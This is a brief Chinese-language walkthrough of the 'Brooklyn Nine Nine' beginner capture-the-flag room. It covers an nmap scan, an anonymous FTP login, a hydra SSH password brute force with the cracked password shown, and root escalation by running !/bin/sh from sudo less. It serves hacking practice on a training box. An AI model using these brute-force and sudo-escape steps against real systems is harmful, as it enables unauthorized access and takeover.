Brooklyn Nine Nine
这个房间的目标是初学者水平的黑客,但任何人都可以尝试破解这个盒子。有两种主要的方法用于根目录。
nmap扫描端口
nmap -sV 10.10.235.168 -P-
用nmap对21,22,80端口进行综合扫描
经探测21端口FTP可以匿名登录
nmap -A 10.10.235.168 -p21,22,80
先登录到FTP ftp 10.10.235.168
下载里面note_to_jake.txt
查看这个txt可以列出三个账号:Amy,Jake,Holt。根据提示Jake的密码是弱口令
80端口扫了一波网站目录没有发现可以利用的点,看来还是从ssh入手
hydra用jake爆破ssh
账号:jake 密码:987654321
hydra -l jake -P /usr/share/wordlists/rockyou.txt.gz -vV -t 64 ssh://10.10.235.168 -f
利用jake登录到ssh
ssh jake@10.10.235.168
ls发现用户下没有user.txt
用find查找
find / -type f -name "user.txt" 2> /dev/null
2> /dev/null 是把错误的信息重定向到/dev/null
发现user.txt 再holt的家目录下。
接下来要提权
现sudo -l 看下具有sudo权限的命令
是less less可以直接查看root.txt
也可以用来提权root
less可以直接查看root目录下的root.txt
sudo less /root/root.txt
提权root,现用sudo less /root/root.txt到查看模式下
进入到查看模式直接输入 !/bin/sh 回车
提权成功
要退出直接exit